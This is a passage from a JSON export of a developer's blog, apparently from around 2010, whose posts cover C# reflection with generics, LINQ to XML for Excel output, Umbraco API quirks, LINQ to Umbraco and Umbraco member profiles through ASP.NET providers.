are not overly complex, they hold the various meta-data about the Excel document we are creating, I’ll skip them as they aren’t really interesting and can easily be found in the source.\nStyles This section is really important and handy for configuring custom looks within the document. There are way too many options to configure here to cover in the demo, it’s easiest to generate the styles in Excel and save the file as an XML document (or read the XSD if you really want!). If you’re doing custom styles make sure you note the ID you give the style so you can use it later in your document.\nAlso, these styles are workbook-wide, not worksheet-wide, so you can reuse them on each worksheet you create. I have a very simple bold header.\nGenerating a Worksheet Here is where the fun starts, we need to generate our worksheet. 
There are 4 bits of data we need to output here:\nNumber of columns Number of Rows Header Data Rows To illustrate the power of LINQ I’ve actually dynamically generated the header row: Update: You should use dataToShow.First() not dataToShow.ToList() so you can get the properties for the header\nvar headerRow = from p in dataToShow.First().GetType().GetProperties() select new XElement(mainNamespace + "Cell", new XElement(mainNamespace + "Data", new XAttribute(ss + "Type", "String"), p.Name ) ); This is just a little bit of fun using LINQ and Reflection to dynamically generate the column headers ;)\nNext we need to output the number of columns and number of rows (keep in mind the row count is the data count + header row count):\nnew XAttribute(ss + "ExpandedColumnCount", headerRow.Count()), new XAttribute(ss + "ExpandedRowCount", dataToShow.Count() + 1), Now we put out the header cells:\nnew XElement(mainNamespace + "Row", new XAttribute(ss + "StyleID", "Header"), headerRow ), Then lastly we generate the data cells (note - this can be done like the header, I just chose to do it differently to illustrate that it can be done several ways):\n(yes I used an image this time, the formatting is a real bitch in the Umbraco WYSIWYG editor!).\nLastly there needs to be a WorksheetOptions node, and then you can combine all the XElements together, add it to an XDocument object and save!\nThere you have it, how to create an Excel document using LINQ to XML and C#.\nDownload the source here.\n", "id": "2010-04-08-linq-to-xml-to-excel" }, { "title": "Problems with Assembly Trust", "url": "https://www.aaron-powell.com/posts/2010-04-08-problems-with-assembly-trust/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ ".net", "trust-level", "autofac", "fail" ], "description": "Something to be careful of with downloading assemblies", "content": "When I was migrating PaulPad to ASP.NET MVC2 I decided that I wanted to also upgrade it to Autofac2. The main reason for it was the type registration is much nicer with its lambda syntax than it was in the 1.4 release which PaulPad previously used.\nSo I set about downloading the latest version of Autofac and getting it up and running.\nBecause Autofac2 supports both MVC1 and MVC2 I needed to use Assembly Binding to ensure that it worked properly. And this is where everything started to go bad. I kept getting a weird runtime error, an EntryPointNotFoundException was being thrown.\nAt the time I couldn’t get Autofac2 to compile for .NET 3.5 (I’ve since produced a patch to fix that) so I was in a world of pain.\nI did manage to get it working by implementing my own controller registration and my own IControllerFactory and then it was working fine, even though I used the source of the AutofacControllerFactory! By now I was scratching my head massively, I mean, I’m doing exactly what they are doing, but why does mine not work?\nFrom the limited debugging I was able to do (kind of hard when you don’t have the Autofac PDB’s) I found out that when calling builder.RegisterControllers nothing was happening. The controllers weren’t being found. Huh?
But they were in the assembly, so it wasn’t making sense.\nOnce I got Autofac to compile though I did some debugging and was getting a weird error when it ran the following code:\ntypeof(IController).IsAssignableFrom(controllerType); The error was:\nType IController exists in System.Web.Mvc.dll and System.Web.Mvc.dll\n(Well, something to that effect anyway)\nSo I was sitting there with a completely dumbfounded look on my face, of course it exists in that assembly, but why does it appear there twice? The only logical thought was that it wasn’t doing the assembly binding properly. But how can that be? I’ve not had assembly binding fail before, if it failed it shouldn’t have compiled.\nShit wasn’t making sense.\nSo I rolled back to my downloaded version of Autofac and decided to check the version number, but immediately upon opening up the properties dialog I saw the message “This file came from another computer and might be blocked to help protect this computer”, and then there was the Unblock button.\nfacepalm\nSo I clicked Unblock, compiled and magic happened. It all worked, no problems whatsoever.\nMoral of this story Trust everyone\n", "id": "2010-04-08-problems-with-assembly-trust" }, { "title": "Reflection And Generics", "url": "https://www.aaron-powell.com/posts/2010-04-08-reflection-and-generics/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ ".net", "reflection", "searing-pain" ], "description": "Oh the pain, OH THE PAIN", "content": "Or to name this another way… Oh my god the pain.\nAnyone who’s been brave enough to delve into the bowels of the Umbraco Interaction Layer will have been able to see just how much Reflection I’m using; for those who haven’t, think about this. With the UIL I needed a way to find all the properties of a generated class and be able to either populate all of them or save from all of them. To do that I’ve got some custom attributes which decorate the properties which I look out for.\nNow this in itself isn’t a problem, all my properties are strongly typed, it’s all sweet. The problem was around the populating of the data when you open an existing Umbraco document object. I have two generic methods in my Helper library (which have many an appearance in my Umbraco Membership class too!) which have the construct:\npublic static T GetPropertyValue<T>(Document doc, string key); public static T GetPropertyValue<T>(Document doc, string key, T defaultValue); You’ll notice that one is an overload, and the overload parameter is a generic. This is where the problem arises.\nBecause the generic is defined at use-time there’s no type in the .NET framework which can represent something as a generic like you can with an Int32 or a String, and that’s the crux of it: how do you find the overloaded method using reflection, and once it’s found how do you invoke it!?\nFirst things first, finding the method There’s no simple way in which you do this, in fact, it’s actually rather hacky. If you’re not familiar with finding methods with Reflection you should probably have a read of this http://msdn.microsoft.com/en-us/library/system.reflection.aspx.\nYou’d be mistaken for thinking that you can just pass in the method name, cuz it’s an overload and Reflection doesn’t know which one you want. So the most likely one you need is Type.GetMethod(String, BindingFlags, Binder, Type[], ParameterModifier[]), but you notice something, you need to pass in the type of ALL the parameters for the method. Crap, one is a generic type, so it can’t be specified!
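To see the dead end in action, here’s a minimal, self-contained sketch of the naive lookup (only the Helper/GetPropertyValue shape comes from the post; the Doc stand-in and the method bodies are made up for illustration):

```csharp
using System;
using System.Reflection;

// Stand-ins that mirror the shape of the overloads above; Doc is just a placeholder
// for the Umbraco Document type so the snippet compiles on its own.
public class Doc { }

public static class Helper
{
    public static T GetPropertyValue<T>(Doc doc, string key) { return default(T); }
    public static T GetPropertyValue<T>(Doc doc, string key, T defaultValue) { return defaultValue; }
}

public class NaiveLookup
{
    public static void Main()
    {
        try
        {
            // The "obvious" call - Reflection can't tell the two overloads apart...
            MethodInfo method = typeof(Helper).GetMethod("GetPropertyValue");
            Console.WriteLine(method);
        }
        catch (AmbiguousMatchException)
        {
            // ...so this is what you actually get, and the Type[] overload doesn't help
            // because the third parameter of the overload we want is the open generic T itself.
            Console.WriteLine("AmbiguousMatchException - which overload did you mean?");
        }
    }
}
```

Running that lands in the catch block every time, which is exactly the snag the rest of this post works around.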
This is where I hit a snag, and from all my research the only solution was a dirty little hack.\nWe know what’s different between the two methods, one has two parameters, the other has three, and this is how we’re going to find the sucker. On the Type class there’s another method, Type.GetMethods() or as I prefer to use (to improve performance) Type.GetMethods(BindingFlags bindingAttr). This will get you an array of methods with the right access levels.\nNow let’s pull out our old friend LINQ and find the sucker in the array; we end up with something like this:\nMethodInfo method = typeof(Helper).GetMethods(BindingFlags.Public | BindingFlags.Static).First(m => m.Name == "GetPropertyValue" && m.GetParameters().Count() == 3); Invoking the method Ok, so we found the method but how do we invoke it if it’s generic? That’s actually quite easy:\nint methodResult = (int)method.MakeGenericMethod(typeof(int)).Invoke(null, new object[] { doc, "SomeAlias", default(int) }); So I make a generic instance of the method using a specified type as the generic type and then invoke it (note the third argument, since the overload we found takes a default value)! This is the best and most optimised solution I’ve been able to come up with so far, if anyone can think of something better I’d love to hear it!\n", "id": "2010-04-08-reflection-and-generics" }, { "title": "The great Umbraco API misconception", "url": "https://www.aaron-powell.com/posts/2010-04-08-the-great-umbraco-api-misconception/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "cms", ".net", "caution" ], "description": "Sometimes the truth hurts", "content": "When Umbraco 4 was released it was very exciting that there was an event model around everything in the back-end. This meant you could have more powerful ActionHandlers firing on pre and post events (even though they are named against the standard .NET naming conventions).\nAlso, people were very excited that when a pre, sorry, before event fired it was possible to do a cancel on the event args. This was really good for a Save event, it meant more custom actions, business logic around the saving, you name it.\nBut there’s a problem, canceling the save doesn’t do anything, the data is still saved! But wait, that’s not right, I canceled the event.\nAnd here is the problem, calling Save on a Document object does nothing! Nothing at all except firing the events.\nSo when does the data get saved, well that happens in this line:\ndoc.getProperty("my_property").Value = "Hello World!"; That’s right, the Set statement of the Value property of a Property object (well actually the Set statement of the associated IData.Value property, which is what’s called from Property.set_Value).\nWell yeah, that’s the problem right there, if the Set statement does the save, calling the Save method is rather pointless. It’s also got a really horrible problem of doing a shit load of database calls.\nSo next time you try and hook into the Save event to try and prevent a Save from happening, well sorry to break it to you, it just won’t work! Sure you could tie into the rollback feature as well so when you’re doing a canceled save you can rollback to the previous version, just make sure you don’t re-call the Save method and get stuck in a rollback loop! :P\nI think we may fix this in v5, but you wouldn’t want all the fun nuances of Umbraco going away now would you? :P\nWhat can I do? So is there anything that you can do to get around the eventing order with Umbraco? The answer is yes, yes you can.\nWhy is it like this?
If you’re interested in knowing why this happens check out my article on the design of data types.\n", "id": "2010-04-08-the-great-umbraco-api-misconception" }, { "title": "Why no Umbraco on Aaron-Powell.com?", "url": "https://www.aaron-powell.com/posts/2010-04-08-why-no-umbraco/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "blogging", "paulpad" ], "description": "Why does the new version of Aaron-Powell.com not use Umbraco?", "content": "So unsurprisingly I’ve had a few people question why I’m not using Umbraco for the latest version of Aaron-Powell.com.\nFirst off let’s just have a look back on my blogging and the blog engines I’ve used.\nBack before I was the world-famous blogger that I am today I used Windows Live Spaces for blogging, yeah, I was just that awesome. But when I decided to buy my own domain I thought it was only appropriate that I started using some actual software.\nI chose Umbraco, which was in version 3 at the time (this was somewhere around August 2008) which wasn’t too bad at the time.\nI installed Warren Buckley’s Creative Web Starter kit which was available at the time. Last year when I met him and he had a look I think he was shocked at just how old a version of it I was running! I had a pretty basic skin on it, which err, was ok (ha!).\nNext I installed the Blog 4 Umbraco package (version 1) which I then rewrote the front end controls for it.\nBy now I was not really using OOTB other than the document types (which I’d also hacked a bit) and it was starting to become a bit of a mess. But I kept with it, I did a major overhaul of it when I produced the LINQ to Umbraco training videos.\nAnd this brings us to the present day. Although my Umbraco site did do what I needed it to do, but I’m never content, so I was looking for the next round of improvements. Since MVC is completely the sex I decided that I wanted to use that as a blogging platform. Now it is true that I could have used Umbraco still, but I don’t really have the time to re-write the front end yet again! :P\nThis is why I chose PaulPad, that and I really liked the OOTB style of the site. Essentially it brought all of what I was looking for in a code base to me with very little work needed.\nSomething else really appealing about PaulPad is that this is actually much less of a blogging platform than it is a wiki platform. Something I had noticed on my Umbraco blogging engine was that it wasn’t great if I wanted to go back and revise a post and have it very obvious. With more of a wiki feel it’s easier to do that. Also, there’s a lot more transparency over the revision history, which will be handy with some upcoming topics.\nLastly, I believe that if you are going to be able to truly evangalise a platform (ie - Umbraco) you can’t just use it. You need to be familiar with your competitors (although PaulPad is hardly a competitor :P), so this is a good way to really just play with something that’s not Umbraco.\nHopefully that sheds some light on my madness regarding my dismissal of Umbraco as my choice of blogging platform.\n", "id": "2010-04-08-why-no-umbraco" }, { "title": "Building LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-04-07-building-linq-to-umbraco/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "linq", "linq-to-umbraco" ], "description": "Ever wondered how LINQ to Umbraco was build? 
Well look no further", "content": "In the beginning LINQ to Umbraco is actually a lot older a project than most people realise, in fact the initial idea of LINQ to Umbraco started when I had a discussion with Niels Hartvig (founder of Umbraco) at the end of 2007 when he was running training in Melbourne.\nBack then C# 3.0 was just released, Visual Studio 2008 was just out and everyone was very excited about this new technology, LINQ. I discussed it with him and he really liked the idea of having a LINQ provider, but it was nothing more than a “That would be awesome!” idea. Keep in mind, this is before Umbraco 4.0 had even been released!\nAbout 6 months later I had got fed up with working directly with the Document API (as we were doing a lot of Document creation at the time) and I decided that I would write a wrapper for it. This project was called Umbraco Interaction Layer, and was really just a new way to create/ edit/ delete documents. As an afterthought I decided to add “LINQ” to it, but it was again nothing more than a wrapper on top of the Document API so it was really shit slow (and would really hammer a database!).\nAfter I released the initial version there was a lot of community excitement about having LINQ to Umbraco, so after raising it with Niels that I was planning on writing a proper LINQ provider, one which wouldn’t bring a server to its knees, I was asked to join the core team and include it in the Umbraco 4.5 release.\n", "id": "2010-04-07-building-linq-to-umbraco" }, { "title": "C#/ .NET", "url": "https://www.aaron-powell.com/posts/2010-04-07-csharp/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "c#", ".net" ], "description": "Source of all that I've written about in the .NET world", "content": "##My Projects\nAaronPowell.Dynamics Location Service with F# and Twitter NuGet How to install a package into all projects of a solution Creating a NuGet-based plugin engine Querying NuGet via LINQPad LINQ Articles LINQ to XML to… Excel? Query Syntax vs Method Syntax Lucene.Net Overview The dark arts Reflection and Generics Recursive anonymous functions - the .NET version Why does this code work? Dealing with type casting limitations Dynamic Dictionaries with C# 4.0 Using Lazy<T> with KeyedCollection Miscellaneous Problems with Assembly Trust Working with dates and LINQ to SQL Handy extension method for null-coalesing Supporting ValueTypes in Autofac Testable Email Sending A LINQ observation Musings Are Extension Methods Really Evil?\n", "id": "2010-04-07-csharp" }, { "title": "Extending Umbraco Members", "url": "https://www.aaron-powell.com/posts/2010-04-07-extending-umbraco-members/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "umbraco-3", "members" ], "description": "", "content": "Recently we’ve had several projects which have come through in which we are building a solution in Umbraco and the client wants to have memberships within the site.\nUmbraco 3.x has a fairly neat membership system but it’s a bit limited when you want to interact with the member at a code level. Because members are just specialised nodes they can quite easily have custom properties put against them, but reading them in your code is less than appealing.
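To give a rough idea of what that looks like, here’s a hedged sketch of the kind of repetitive code you end up writing against the raw Member API. The Member.getProperty(alias)/Value calls are the standard Umbraco ones; the aliases, the helper names and the null/type handling are invented for the example, not lifted from the framework class described below:

```csharp
// Member comes from the Umbraco businesslogic/cms assemblies
// (umbraco.cms.businesslogic.member in the 3.x API, as an assumption).
public static class RawMemberReading
{
    public static string GetFirstName(Member member)
    {
        // Read via the raw API and hope the alias is spelled correctly.
        var property = member.getProperty("firstName");
        if (property == null || property.Value == null)
        {
            return string.Empty;
        }
        return property.Value.ToString();
    }

    public static int GetPoints(Member member)
    {
        var property = member.getProperty("points");
        int value;
        if (property == null || property.Value == null ||
            !int.TryParse(property.Value.ToString(), out value))
        {
            return 0; // fall back to a sensible default
        }
        return value;
    }
}
```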
You’ve got to make sure you’re reading from the correct alias, type checking, null checking, etc.\nAnd as I kept finding I was writing the same code over and over again for reading and writing the properties, I thought I’d put together a small framework class.\nThe framework requires the following Umbraco DLL’s:\nbusinesslogic.dll cms.dll So let’s look at some sections of the class.\nDefault Properties A member has a few default properties which are also built into the framework. There are also a few additional properties which the framework uses (such as the MembershipTypeId) which are coded in. All of the default properties are virtual so they can be overridden if so desired. An interesting addition I have made is the IsDirty property. This is used later on during the Save to ensure that only members whose data has actually changed are saved back into Umbraco. This limits database hits and improves performance.\nConstructors I’ve found that there are 3 really useful constructors, a new member constructor and two existing member constructors. What you’ll notice from this is that the constructor which takes an Umbraco member is actually marked as private. This is because the framework is targeted at multi-tiered applications, like MVC/ MVP where you want to keep data layers separate from the others. And by doing this you can avoid having the Umbraco DLL’s included in any other project in your solution.\nNext you’ll notice a call to the method PopulateCustomProperties, this is an abstract method which you need to implement yourself to populate your own properties on a membership object.\nClick to see the Saving method.\nNotice the use of the IsDirty flag to ensure we’re only saving what we should save.\nHelper Methods I’ve provided a few helper methods which can be used for the reading and writing of custom properties on the Umbraco membership object.\nThe two get methods handle the null and default data checking, along with casting back to the appropriate data type. Here’s an example implementation:\nThe save is really just a shortcut, I was sick of typing out that same command every time, to use it you would call it from the PrepareMemberForSaving method like so:\nAnd we’re done\nSo there you have it, a simple little class for creating a .NET implementation of an Umbraco member.\nThere are two downloads available, Member.cs or a compiled DLL.\nIt will be interesting though when Umbraco 4 ships and the membership model changes to use the ASP.NET membership providers…\n", "id": "2010-04-07-extending-umbraco-members" }, { "title": "Overview", "url": "https://www.aaron-powell.com/posts/2010-04-07-linq-to-umbraco-overview/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "umbaco", "linq-to-umbraco" ], "description": "An overview of LINQ to Umbraco", "content": "What? Anyone who has had to do a lot of work with the Umbraco API and interacting with nodes will know that using the .NET API isn’t great. It’s not bad, but in a strongly typed world loosely typed objects are nowhere near as much fun.\nEspecially if you want to move around those items!\nUmbraco is more than just a content management system, Umbraco is a great application framework. If you start looking conceptually at Document Types in Umbraco you’ll realise that they are really just a way of describing data.
So to this end they are actually really great at describing .NET types.\nLINQ to Umbraco aims to take these meta-types which you are defining within the CMS and generate strongly typed representations of them which you can work with at a .NET level.\nThe types defined in Umbraco can easily be used to represent any data. To this end LINQ to Umbraco is provider based, allowing the underlying data source to be defined by the developer.\nProvider Based? Because of the way LINQ to Umbraco is designed it is possible to swap out the way that the data is accessed. This is what the UmbracoDataProvider class is used for.\nOut of the box LINQ to Umbraco supplies a single UmbracoDataProvider implementation, the NodeDataProvider.\nThe NodeDataProvider is designed to interact with the XML cache of Umbraco, working with published data. This provides read-only operations, despite LINQ to Umbraco providing full CRUD capabilities.\nWhen to use it? LINQ to Umbraco is not designed to be a replacement for XSLT, nor is it to be a complete replacement for the existing Umbraco APIs.\nThat’s not saying it can’t be used in these scenarios, but LINQ to Umbraco is best used when you’re looking at Umbraco data in a site-wide scope.\nDesign The design of LINQ to Umbraco borrows very heavily from that of LINQ to SQL, by having a DataContext which all interactions flow out from.\nBecause of this (and due to the provider model) there is no understanding of the data hierarchy. With the initial access of the data from the DataContext it looks at the data as a whole picture, allowing you to not concern yourself with the hierarchy, unless you need it.\nIn addition to having a LINQ to SQL style DataContext all of the hierarchy of Umbraco is matched by LINQ to Umbraco. This means that you can traverse down a node’s children collections, in a strongly typed manner.\n", "id": "2010-04-07-linq-to-umbraco-overview" }, { "title": "Training Videos", "url": "https://www.aaron-powell.com/posts/2010-04-07-training-videos/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [], "description": "Instructional videos to get you up and running with LINQ to Umbraco", "content": "In an effort to get everyone up to speed with LINQ to Umbraco I have put together a series of videos. This series looks at how you can use LINQ to Umbraco to create a simple blog engine.\nSession 1 Getting Started\nIn this session I’ll be looking at the basics of what is required for LINQ to Umbraco. We’ll look at how to generate the classes and some suggestions on how to get the best generated class names.\nSession 2 Working with LINQ to Umbraco entities\nIn this session I’ll be looking at the code which was generated from the first session and how we can do some basic interactions. We’ll also create our first control using LINQ to Umbraco.\nSession 3 Delving into the UmbracoDataContext\nIn this session I’ll be looking at the heart of LINQ to Umbraco, the UmbracoDataContext. We’ll look at what its role is, and how it can be used in extensibility.\nSession 4 Performance and Caching\nIn this session I’ll look at how to get the most out of performance and the caching which is built into LINQ to Umbraco.\nSession 5 Paging and Control-less forms\nIn this session I’ll be looking at how easy it is to do paging with LINQ to Umbraco entities.
Also with MVC being such a hot topic I’ll show you how you can make a form which renders LINQ to Umbraco with no ASP.NET server controls.\nSession 6 Outputting XML\nIn this session I’ll be looking at how you can transform the LINQ to Umbraco entities and generate an XML response, for something such as a RSS feed.\n", "id": "2010-04-07-training-videos" }, { "title": "Umbraco Members Profiles", "url": "https://www.aaron-powell.com/posts/2010-04-07-umbraco-members-profiles/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "members" ], "description": "", "content": "Almost 12 months ago I did a post looking at how to make .NET interaction with Umbraco Members easier (Extending Umbraco Members). This was for Umbraco 3.x, but now with Umbraco 4.x a question that has been coming up a lot on the Umbraco forums of recent is how to work with the Umbraco Membership. When Umbraco 4 was released it brought in the implementation of the ASP.NET Membership classes (MembershipProvider, RoleProvider and ProfileProvider).\nThese classes were implemented via the umbraco.providers assembly and were essentially just wrappers for the underlying Umbraco Member/ Member Type/ Member Group classes.\nAlthough they still go through the Umbraco API underneath what was very nice was that now it was possible to use the standard ASP.NET login controls, Forms Authentication, etc. And if you’re really brave you could drop in your own membership provider, such as the SqlMembershipProvider or any custom solution you’d written.\nSomething that seems to have been neglected is how to work with the Member Type information. By default you only have Name, Username and Password on a Member in Umbraco, so we extend it via the MemberType, but how do we get that data back? Generally people will just use the Umbraco API and the Member.getProperty(alias) method, but that kind of nulls the point of having the ASP.NET Membership available to us, and what if you did want to swap out the providers (although I highly doubt that would ever happen)?\nThat’s what I’m going to explain here, how you can use the ASP.NET ProfileProvider and it’s associated classes with an Umbraco-defined MemberType.\nOur Member Type For this I’m going to have a very basic little Member Type, it’ll have three bits of data on it, First Name, Middle Name and Last Name.\nAs you can see these are defined as per normal, nothing special about that. I can then go to my Umbraco Member and enter some data and view it:\nAccessing via ASP.NET Now we need to be able to access this via ASP.NET, there are two things we need to configure. First is we want to define our .NET class which represents the Member Type. To do this we need to create a class which inherits from System.Web.Profile.ProfileBase:\nusing System; using System.Web.Profile; public class MemberProfile : ProfileBase { ... } Now we have to define the properties which we want exposed from our MemberType. The nice thing is here I don’t have to expose everything, if there was a property which I didn’t want/ need access to, I can easily just leave it out. 
So lets define our properties:\n[SettingsAllowAnonymous(false)] public string FirstName { get { var o = base.GetPropertyValue("first_name"); if (o == DBNull.Value) { return string.Empty; } return (string)o; } set { base.SetPropertyValue("first_name", value); } } [SettingsAllowAnonymous(false)] public string LastName { get { var o = base.GetPropertyValue("last_name"); if (o == DBNull.Value) { return string.Empty; } return (string)o; } set { base.SetPropertyValue("last_name", value); } } [SettingsAllowAnonymous(false)] public string MiddleName { get { var o = base.GetPropertyValue("middle_name"); if (o == DBNull.Value) { return string.Empty; } return (string)o; } set { base.SetPropertyValue("middle_name", value); } } So as you can see I’ve created three properties which we are exposing. Notice how all of them are doing a base.GetPropertyValue(string) method call, and the string we are passing in is the Alias of the Member Type property. This is because we’ll be using the Umbraco ProfileProvider which expects the property alias. This means that we can easily create a friendly name in our class for the property (such as FirstName) and pass through the un-friendly name as the alisa (first_name). Additionally I’ve marked all the classes with the SettingsAllowAnonymousAttribute and set it to false. Profiles in ASP.NET Membership can support anonymous profiles, but I wont be covering that.\nNow that we’ve defined our class for the profile we need to tell ASP.NET to use it. This is really easy, thanks to the umbraco.provider.members.UmbracoProfileProvider class. This class is an implementation of the ProfileProvider abstract class, and is designed to get the profile information for an Umbraco member.\nSo we need to set up our web.config like so:\n<system.web> <profile defaultProvider="UmbracoMemberProfileProvider" enabled="true" inherits="UmbracoMemberDemo.Web.MemberProfile, UmbracoMemberDemo.Web"> <providers> <clear /> <add name="UmbracoMemberProfileProvider" type="umbraco.providers.members.UmbracoProfileProvider, umbraco.providers" /> </providers> <properties> <clear /> <add name="first_name" allowAnonymous ="false" provider="UmbracoMemberProfileProvider" type="System.String" /> <add name="last_name" allowAnonymous ="false" provider="UmbracoMemberProfileProvider" type="System.String" /> <add name="middle_name" allowAnonymous ="false" provider="UmbracoMemberProfileProvider" type="System.String" /> </properties> </profile> </system.web> So what have we done? Well on the node I have defined that I want to use the UmbracoMemberProfileProvider as the default (if I had multiple profile providers defined that is of relivance) and that the profile will inherit my class UmbracoMember.Web.MemberProfile which is in the UmbracoMemberDemo.Web assembly. This will let ASP.NET know the class type and I can then access the properties through my class.\nLastly I defined the properties which are in the class, with their name being the Alias in Umbraco. I’ve also explicity defined the provider they will come from, again if I had multiple providers defined I could have multiple locations where I get the data, and it’s at the property level I would define where it comes from.\nUsing the Profile Well we’ve set up all that really needs to be set up, it’s really that simple! But how do we access the data in the profile? 
Well I’m going to make an assumption that you have secured pages and the following code is being run within one.\nFrom the current HttpContext object we have access to the profile, via HttpContext.Current.Profile and this will return me a ProfileBase instance. So I can now do this:\nstring firstName = ((MemberProfile)HttpContext.Current.Profile).FirstName; And remember that the property has a setter as well, so I can write back to it as well, which will then write back to Umbraco.\nI can make a .NET user control and do something like this also:\n<div> <p> <span>First Name: <%= ((UmbracoMemberTester.Web.MemberProfile)Context.Profile).FirstName %></span> </p> <p> <span>Middle Name: <%= ((UmbracoMemberTester.Web.MemberProfile)Context.Profile).MiddleName %></span> </p> <p> <span>Last Name: <%= ((UmbracoMemberTester.Web.MemberProfile)Context.Profile).LastName %></span> </p> </div> That bit of code does not even require a back-end file for the User Control. And how does it look? Well just like this:\nConclusion I hope that this has been useful and explains just how easy it can be to use standard ASP.NET features to expose Umbraco Member Types.\n", "id": "2010-04-07-umbraco-members-profiles" }, { "title": "Random Stuff!", "url": "https://www.aaron-powell.com/posts/2010-04-06-random/", "date": "Tue, 06 Apr 2010 00:00:00 +0000", "tags": [ "random", "ranting" ], "description": "So it doesn't fall into other categories? You'll find it here, along with random rants.", "content": "##Random posts and Ranting##\n2009, a year in review Oh woe is (Mobile)Me 2010, a year in review Useful Tools Developer Tools LinqPad Best way to test C# or VB.NET without having to create a console application Notepad++ My choice for a Notepad replacement. Syntax highlighting in just about every language RedGate’s Reflector If you’re a .NET dev and don’t have this installed get out of my framework Expresso By far my favorite Regular Expression builder and tester WinMerge If you’re using SVN, or just need to be able to diff and merge files or folders this is what you want Web Developer Tools Charles I was a fan of Fiddler but since using Charles I can’t go back. I don’t know how they can do so much stuff with Java! Supports all major OS’s. I don’t care that it’s not free, it’s completely worth the money Administration Tools SmartFTP I’ve used a lot of FTP clients and this is by far the best. Lovely UI, great FTP management, but my favorite feature would have to be the differential uploading. It looks at a file and works out if it should be replaced. Saves bandwidth by not uploading what you don’t need to upload. It’s also highly configurable. Well worth the money mRemote Need to RDP into lots of machines? This is the best tool I’ve used for that. Supports all major remote-connection protocols.
Having the ability to create folders and “filter down” the settings to the connections within it is great if you need to use the same credentials on lots of machines ", "id": "2010-04-06-random" }, { "title": "Web Development", "url": "https://www.aaron-powell.com/posts/2010-04-04-web-dev/", "date": "Sun, 04 Apr 2010 00:00:00 +0000", "tags": [ "web", "asp.net", "javascript" ], "description": "Articles on the topic of web development", "content": "Being a web developer by trade, and primarily an ASP.NET developer I come across a few musings around fun things to do.\nMy Projects JavaScript Tools Ole Slidee WhatKey.Net ServerHere - When you just need a webserver Talks JavaScript frameworks ASP.NET ASP.NET Web Forms MVP Contrib ASP.NET Web Forms MVP Yes, I LIKE WebForms ASP.NET MVC Model binding with implicit operators XML Action Result Using HttpCompression libraries and ASP.NET MVC FileResult JavaScript & jQuery Recursive Anonymous Functions Creating jQuery plugins for MS AJAX components, dynamically! The Client Event Pool LINQ in JavaScript Not getting DropDownList value when setting it via JavaScript JavaScript functions that rewrite themselves! A look at browser storage Implementing the blink tag using jQuery Implementing the marquee tag using jQuery Combining blink and marquee! A look at browser storage options Animating with JavaScript Making the Internet Explorer JavaScript tools better Miscellaneous SharePoint feature corrupts page layout\n", "id": "2010-04-04-web-dev" }, { "title": "Umbraco", "url": "https://www.aaron-powell.com/posts/2010-04-01-umbraco/", "date": "Thu, 01 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "cms", ".net" ], "description": "All my articles about the worlds friendliest CMS", "content": "LINQ to UmbracoLINQ to Umbraco is a new API which is coming in Umbraco 4.1 that will provide a provider-model LINQ API for working with Umbraco data.\nOverview Understanding LINQ to Umbraco Why no IQuerable in LINQ to Umbraco Training Videos Building LINQ to Umbraco Creating a RssDataProvider for LINQ to Umbraco LINQ to Umbraco Extensions Home Source Creating a custom LINQ to Umbraco data provider Implementing a Tree class Umbraco APIThe Umbraco API is powerful, but it has some very fun things within it.\nThe great Umbraco API misconception Extending Umbraco Members Umbraco Member Profiles Umbraco Event Improvements Umbraco DataType Design Unit Testing with Umbraco Custom Umbraco Macro Engines NHaml Umbraco Macro Engine User group sessions & Speaking arrangements January 2010 DDD Melbourne CodeGarden 10 General Umbraco Why not Umbraco on Aaron-Powell.com? 
Why I’m not a fan of XSLT Exception thrown when using XSLT extensions Mercurial 101 A Guide to Contributing How I develop Umbraco Scripting with Umbraco Creating a menu in Umbraco with IronRuby\nIronRuby tips and tricks\nUsing Razor in Umbraco 4\n", "id": "2010-04-01-umbraco" }, { "title": "The answer to why this code works", "url": "https://www.aaron-powell.com/posts/2010-01-23-the-answer-to-why-this-cover-works/", "date": "Sat, 23 Jan 2010 00:00:00 +0000", "tags": [ "generic .net", "umbraco" ], "description": "", "content": "So at the start of this week I put up a blog asking Why this code works, and to be honest I've grown quite a bit of an ego since then as no-one has been able to answer the question correctly.\nOne person did get close, but close doesn't quite cut it ;).\nWell the answer is actually very simple, and it's a really handy feature of the C# language, explicit operators.\nExplicit operators allow you to define explicit casting between types. So the code that was missing from my original post was this:\npublic static explicit operator UmbracoPage(XElement x) { return new UmbracoPage(x); } What I've done here is defined how the compiler is to treat a casting of an XElement to an instance of UmbracoPage, and since UmbracoPage implements IUmbracoPage there is already a defined casting to it.\nInside the body of my explicit operator I can do anything I desire, here I'm just returning a new instance, passing the XElement to the constructor.\nI find it really quite elegant, and that it reduces code smell quite nicely.\nBut explicit operators also have a buddy, in the form of implicit operators (which was the close-but-no-cigar answer). These work by the type being defined by the assignment target, eg:\nUmbracoPage page = xElement; I'm personally not a fan of implicit operators though, I find them less obvious when you're reading code.\nSo there you have it, a slightly obscure language feature to play with!\n", "id": "2010-01-23-the-answer-to-why-this-cover-works" }, { "title": "Recursive anonymous functions - the .NET version", "url": "https://www.aaron-powell.com/posts/2009-07-15-recursive-anonymous-functions-the-net-version/", "date": "Wed, 15 Jul 2009 00:00:00 +0000", "tags": [], "description": "To know recursion you must first know recursion", "content": "When playing around with JavaScript I decided to have a look at creating recursive anonymous functions, which are a good bit of fun.\nWell I decided to have a challenge, could you do it in .NET? Well let’s ignore the pointlessness of the exercise and just enjoy the challenge.\nWell, I did it, it sure as shit isn’t pretty but hey, it works. In this post I’ll show off how it works, but to sum it up - Reflection. But nowhere near as much as you’d think.\nPart of why I wanted to try it was for LINQ to Umbraco, to see the performance of how we’re loading nodes at the moment and if we could optimise it (and this isn’t the way, if there is one!). I’m doing a recursive call against an XML file, trying to find a node which is at a depth I don’t know.\nWith JavaScript functions there’s the really nice arguments.callee which is a 